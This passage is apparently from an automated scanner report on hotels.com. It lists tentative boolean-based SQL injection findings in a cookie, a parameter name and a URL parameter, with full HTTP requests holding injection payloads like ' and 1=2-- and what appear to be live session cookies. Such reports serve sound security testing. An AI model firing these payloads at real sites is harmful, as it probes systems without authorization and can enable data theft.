Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA17075075'%20or%201%3d2--%20; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.14. http://www.hotels.com/compare/hotel_dockingbar.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.2.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:17 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:17 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:18 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.15. http://www.hotels.com/compare/hotel_dockingbar.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A108.1.0.i2%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:31 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjE5OC4yLjA6MTQ1LjAuMC5pMjoyMDAuMC4wOjEwOC4xLjAuaTI6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi42LjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4xLjAuaTF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:31 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:32 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.16. http://www.hotels.com/hotel/details.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

